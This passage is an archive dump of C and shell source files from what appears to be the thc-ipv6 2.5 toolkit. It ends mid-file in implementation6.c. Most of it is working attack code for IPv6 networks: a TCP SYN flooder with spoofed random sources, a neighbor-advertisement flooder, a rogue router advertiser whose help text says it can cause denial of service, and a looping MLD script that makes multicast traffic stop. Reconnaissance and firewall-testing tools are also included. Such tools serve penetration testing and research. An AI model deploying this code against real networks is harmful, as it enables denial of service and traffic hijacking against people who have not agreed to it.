thc-ipv6-2.5/6to4test.sh0000755000000000000000000000073012234222353013547 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" -o -z "$2" && { echo Syntax: $0 interface ipv4address echo This little script tests if the IPv4 target has a dynamic 6to4 tunnel active echo Requires address6 and thcping6 from thc-ipv6 exit 1 } HEX=`address6 $2 | head -n 2 | tail -n 1 | sed 's/.*:://'` test -z "$HEX" && { echo Error: could not generate ipv6 address from ipv4 address $1 ; exit 1 ; } TARGET="2002:$HEX::$HEX" echo thcping6 $1 $TARGET thcping6 $1 $TARGET thc-ipv6-2.5/fake_solicitate6.c0000644000000000000000000001054612251022436015101 0ustar rootroot #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-DHF] interface ip-address-solicitated [target-address [mac-address-solicitated [source-ip-address]]]\n\n", prg); printf("Solicate IPv6 address on the network, sending it to the all-nodes multicast address\n"); // printf("Option -H adds a hop-by-hop header, -F a one shot fragment header,\n"); // printf("-D adds a large destination header which fragments the packet.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[24], buf2[6], buf3[1500]; unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14; char *interface; int rawmode = 0; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "DFHr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (argc - optind >= 3 && argv[optind + 2] != NULL) dst6 = thc_resolve6(argv[optind + 2]); else dst6 = thc_resolve6("ff02::1"); if (dst6 == NULL) { fprintf(stderr, "Error: could not resolve destination of solicitate: %s\n", argv[optind + 2]); exit(-1); } if (rawmode == 0) { if (argc - optind >= 4 && argv[optind + 3] != NULL) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); } if (argc - optind >= 5 && argv[optind + 4] != NULL) src6 = thc_resolve6(argv[optind + 4]); else src6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (mac == NULL || src6 == NULL) { fprintf(stderr, "Error: invalid interface %s or invalid mac/ip defined\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); memcpy(buf, unicast6, 16); buf[16] = 1; buf[17] = 1; memcpy(&buf[18], mac, 6); flags = 0; // ICMP6_NEIGHBORADV_OVERRIDE; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORSOL, 0, flags, (unsigned char *) &buf, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting solicitation of %s (Press Control-C to end)\n", argv[optind + 1]); while (1) { if (do_dst) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt1, &pkt1_len); } sleep(5); } return 0; } thc-ipv6-2.5/flood_advertise6.c0000644000000000000000000000526412251022436015125 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with neighbor advertisements.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0, flags, rawmode = 0, count = 0; if (argc > 1 && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc == 3) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target IPv6 address\n"); exit(-1); } ip6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 2; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; memcpy(buf, ip6, 16); flags = ICMP6_NEIGHBORADV_OVERRIDE; printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; memcpy(buf + 10, ip6 + 10, 6); memcpy(&buf[20], mac + 2, 4); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/thcsyn6.c0000644000000000000000000001057512251022441013261 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-AcDrRS] [-p port] [-s sourceip6] interface target port\n\n", prg); printf("Options:\n"); printf(" -A send TCP-ACK packets\n"); printf(" -S send TCP-SYN-ACK packets\n"); printf(" -r randomize the source from your /64 prefix\n"); printf(" -R randomize the source fully\n"); printf(" -s sourceip6 use this as source IPv6 address\n"); printf(" -D randomize the destination (treat as /64)\n"); printf(" -p port use fixed source port\n"); printf("\nFlood the target port with TCP-SYN packets. If you supply \"x\" as port, it\nis randomized.\n"); exit(-1); } #define IDS_STRING 0xbebacefa int main(int argc, char *argv[]) { char *interface, *ptr, buf2[8]; unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL; int i, type = TCP_SYN, alert = 0, randsrc = 0, randdst = 0, randsrcp = 1, randdstp = 0, dont_crc = 0, seq; unsigned char *pkt = NULL; int pkt_len = 0, count = 0; unsigned short int sport, port; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "aAcrRsDSp:")) >= 0) { switch(i) { case 'a': alert = 8; break; case 'A': type = TCP_ACK; break; case 'S': type = TCP_SYN + TCP_ACK; break; case 'c': dont_crc = IDS_STRING; break; case 'r': randsrc = 8; break; case 'R': randsrc = 1; break; case 'D': randdst = 8; break; case 'p': sport = atoi(optarg); randsrcp = 0; case 's': src = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (argc - optind < 3) help(argv[0]); interface = argv[optind]; if ((ptr = index(argv[optind + 1], '/')) != NULL) *ptr = 0; if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]); exit(-1); } if (strcasecmp(argv[optind + 2], "x") == 0) randdstp = 1; else port = atoi(argv[optind + 2]); if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (src == NULL) if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface); exit(-1); } if (src[0] >= 0xfe && dst[0] < 0xfe) { fprintf(stderr, "Error: link local address on interface, destination however is remote\n"); exit(-1); } if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]); exit(-1); } memset(buf2, 0, sizeof(buf2)); buf2[0] = 5; buf2[1] = 2; printf("Starting to flood target network with TCP%s%s %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", (type & TCP_SYN) > 0 ? "-SYN" : "", (type & TCP_ACK) > 0 ? "-ACK" : "", interface); while (1) { if (randsrc) { for (i = randsrc; i < 16; i++) src[i] = rand() % 256; } if (randdst) { for (i = randdst; i < 16; i++) dst[i] = rand() % 256; } if (randsrcp) sport = rand() % 65536; if (randdstp) port = rand() % 65536; seq = rand(); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (alert) { if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (thc_add_tcp(pkt, &pkt_len, sport, port, seq, 0, type, 0x3840, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_router6.c0000644000000000000000000002234412251022436014260 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, myoff = 14; unsigned char *frip6, *frmac; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface network-address/prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]]\n\n", prg); printf("Announce yourself as a router and try to become the default router.\n"); printf("If a non-existing link-local or mac address is supplied, this results in a DOS.\n"); printf("Option -H adds hop-by-hop, -F fragmentation header and -D dst header.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14); int pkt_len = 0, cnt, i; if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL || header->caplen < 14 + 40 + 2) return; if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0) return; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0) return; if (do_dst) { thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len); frhdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(frint, frip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0) return; } pkt = thc_destroy_packet(pkt); } int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); unsigned char *dns; int size, mtu = 1500, i, j, k, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(mac, 0, sizeof(mac)); interface = argv[optind]; mtu = thc_get_mtu(interface); if (argc - optind >= 5) mtu = atoi(argv[optind + 4]); if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc - optind >= 4 && argv[optind + 3] != NULL) ip6 = thc_resolve6(argv[optind + 3]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); frip6 = ip6; frint = interface; frmac = mac6; if (argc - optind >= 4 && argv[optind + 2] != NULL) dns = thc_resolve6(argv[optind + 2]); else dns = thc_resolve6("ff02::fb"); routerip = argv[optind + 1]; if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); route6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]); exit(-1); } if (size < 48 || size > 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]); exit(-1); } if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } i = 128 - size; j = i / 8; k = i % 8; if (k > 0) j++; memset(route6 + 16 - j, 0, j); if (k > 0) route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k); // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x03; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; // 56-71 address: 2000:: i += 15; // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x07; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0xfc; // 56-71 address: fc:: i += 15; // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; memcpy(buf + i, dns, 16); // dns server i += 16; frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; // init pcap printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sleep(5); } return 0; } thc-ipv6-2.5/node_query6.c0000644000000000000000000001124412251022440014114 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, seen = 0, ret = -1; unsigned char *frip6, *frmac, *frdst; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface target\n\n", prg); printf("Sends an ICMPv6 node query request to the target and dumps the replies.\n\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void dump_node_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14), *ptr; int i, len = header->caplen - 14; if (do_hdr_size) { len = header->caplen - do_hdr_size; ipv6hdr = (unsigned char *) (data + do_hdr_size); if ((ipv6hdr[0] & 240) != 0x60) return; } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_INFOREPLY || len < 40 + 16) return; ret = 0; printf("Reply from %s:\n", thc_ipv62notation(ipv6hdr + 8)); switch (ipv6hdr[45]) { case 2: printf(" DNS result: "); if (len <= 60) { printf("empty\n"); } else { ptr = ipv6hdr + 61; while (*ptr != 0) { if (*ptr > 0 && *ptr < 32) *ptr = '.'; ptr++; } printf("%s\n", ipv6hdr + 61); } seen++; break; case 3: printf(" IPv6 result: "); if (len <= 76) { printf("empty\n"); } else { printf("\n"); i = 60; while (i + 16 <= len) { printf(" %s\n", thc_ipv62notation((char *) (ipv6hdr+ i))); i += 20; } } seen++; break; case 4: printf(" IPv4 result: "); if (len == 56) { printf("empty\n"); } else { printf("\n"); i = 60; while (i + 4 <= len) { printf(" %d.%d.%d.%d\n", ipv6hdr[i], ipv6hdr[i + 1], ipv6hdr[i + 2], ipv6hdr[i + 3]); i += 8; } } seen++; break; default: printf(" Unknown type (%d) we did not send!\n", ipv6hdr[45]); } printf("\n"); } void clean_exit(int sig) { if (seen == 0) printf("No reply received.\n"); exit(ret); } int main(int argc, char *argv[]) { char *interface, mac[6] = "", string[] = "ip6 and icmp6"; unsigned char *mac6 = mac; unsigned char buf[512]; unsigned char *dst; int i, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc != 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "r")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } interface = argv[optind]; mac6 = thc_get_own_mac(interface); if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: could not resolve %s\n", argv[2]); return -1; } memset(buf, 0, sizeof(buf)); memcpy(buf + 8, dst, 16); i = 24; cnt += getpid(); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00020000, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; usleep(1000); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x0003003e, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; usleep(1000); memcpy(buf + 4, (char *) &cnt + _TAKE4, 4); cnt++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_INFOREQUEST, 0, 0x00040002, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; signal(SIGALRM, clean_exit); alarm(5); while (seen != 3) { while (thc_pcap_check(p, (char *) dump_node_reply, NULL) > 0); usleep(100); } clean_exit(0); return 0; // not reached } thc-ipv6-2.5/dos_mld.sh0000755000000000000000000000103312234222353013471 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo "Syntax: $0 [-2] interface [target-link-local-address multicast-address]" echo If specified, the multicast address of the target will be dropped first. echo All multicast traffic will cease after a while. echo Specify -2 to use MLDv2. exit 1 } X="" test "$1" = "-2" && { X="2" shift } while `true`; do fake_mld${X}6 $i query :: ff02::1 1 fe80:: 11:22:33:44:55:66 33:33:00:00:00:02 test -n "$3" fake_mld${X}6 $i del "$3" ff02::2 1 "$2" 11:22:33:44:55:66 sleep 5 done thc-ipv6-2.5/implementation6.c0000644000000000000000000022235312251022437015002 0ustar rootroot/* * Tests various IPv6 specific options for their implementations * This can also be used to test firewalls, check what it passes. * A sniffer on the other side of the firewall or running implementation6d * shows you what got through. * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int ret_code = 1, matched = 0, gtype1, gtype1a, gtype2, gtype2a, gpos, epos, onecase = 0; unsigned char *gpattern, *gsrc, *gdst, etype, ecode; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-p] [-s sourceip6] interface destination [test-case-number]\n\n", prg); printf("Options:\n"); printf(" -s sourceip6 use the specified source IPv6 address\n"); printf(" -p do not perform an alive check at the beginning and end\n"); printf("\nPerforms some IPv6 implementation checks, can be used to test some\nfirewall features too. Takes approx. 2 minutes to complete.\n"); exit(-1); } void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { return; } void check_packet_n(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) data, len = header->caplen; int off = 0; ipv6hdr = (unsigned char *) (data + 14); len -= 14; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ipv6hdr[0] & 240) != 0x60) return; } if (debug) { printf("DEBUG: packet received\n"); thc_dump_data(ipv6hdr, len, "Received Packet"); } if (ipv6hdr[6] == NXT_FRAG) off = 8; if (86 + off < len) { if (debug) printf("\nDEBUG: packet too short\n"); return; } if (ipv6hdr[6] == NXT_ICMP6 && (ipv6hdr[40] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_TTLEXEED)) return; if (off == 8 && (ipv6hdr[40] == NXT_ICMP6 && (ipv6hdr[40+off] == ICMP6_NEIGHBORSOL || ipv6hdr[40+off] == ICMP6_TTLEXEED))) return; if ((ipv6hdr[6] == NXT_ICMP6 && ipv6hdr[40] == ICMP6_NEIGHBORADV) || (off == 8 && ipv6hdr[40] == NXT_ICMP6 && ipv6hdr[40+off] == ICMP6_NEIGHBORADV)) { if (memcmp(ipv6hdr + 8, gdst, 16) == 0 && memcmp(ipv6hdr + 24 , gsrc, 16) == 0) { matched = 2; return; } } else if ((ipv6hdr[6] == NXT_ICMP6 && ipv6hdr[40] == ICMP6_PARAMPROB)||(off == 8 && ipv6hdr[40] == NXT_ICMP6 && ipv6hdr[40+off] == ICMP6_PARAMPROB)) { if (memcmp(ipv6hdr + 8, gsrc, 16) == 0 && memcmp(ipv6hdr + 24, gdst, 16) == 0) { matched = 1; etype = ipv6hdr[40]; ecode = ipv6hdr[41]; return; } } return; } int check_for_reply_n(pcap_t * p, unsigned char *src, unsigned char *dst) { int ret = -1; time_t t; t = time(NULL); matched = 0; gsrc = src, gdst = dst; while (ret < 0) { (void) thc_pcap_check(p, (char *) check_packet_n, NULL); if (matched > 0) ret = 0; if (time(NULL) > t + 4 && ret < 0) ret = 0; } if (matched <= 0) printf("FAILED - no reply\n"); if (matched == 1) { printf("FAILED - error reply [%d:%d]\n", etype, ecode); if (onecase == 0) sleep(2); } if (matched == 2) { printf("PASSED - we got a reply\n"); ret_code = 0; } usleep(500); return matched; } void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14, off = 0; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ipv6hdr[0] & 240) != 0x60) return; } matched = 0; if (debug) { printf("DEBUG: packet received\n"); thc_dump_data(ipv6hdr, len, "Received Packet"); } if (ipv6hdr[6] == NXT_FRAG) off = 8; if (gpos+off > len && (epos == 0 || epos+off > len)) { matched = -1; if (debug) printf("\nDEBUG: packet too short (2)\n"); return; } if ((ipv6hdr[6] == NXT_ICMP6 || (off == 8 && ipv6hdr[40] == NXT_ICMP6)) && (ipv6hdr[40+off] == ICMP6_NEIGHBORSOL || ipv6hdr[40] == ICMP6_NEIGHBORADV || ipv6hdr[40+off] == ICMP6_TTLEXEED) && ipv6hdr[40+off] != gtype2 && ipv6hdr[40+off] != gtype2a) { matched = -1; return; } //printf("gpos: %d, pattern %x, found %x\n", gpos, gpattern[0], ipv6hdr[gpos]); //printf("epos: %d, pattern %x, found %x\n", epos, gpattern[0], ipv6hdr[epos]); if (gpos > 0 && memcmp(ipv6hdr + gpos + off, gpattern, 